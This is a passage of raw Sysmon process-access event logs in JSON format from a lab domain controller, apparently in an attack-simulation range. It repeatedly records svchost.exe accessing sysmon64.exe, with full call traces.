C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1587,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1588,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1589,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1590,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1591,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1592,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1593,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1594,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 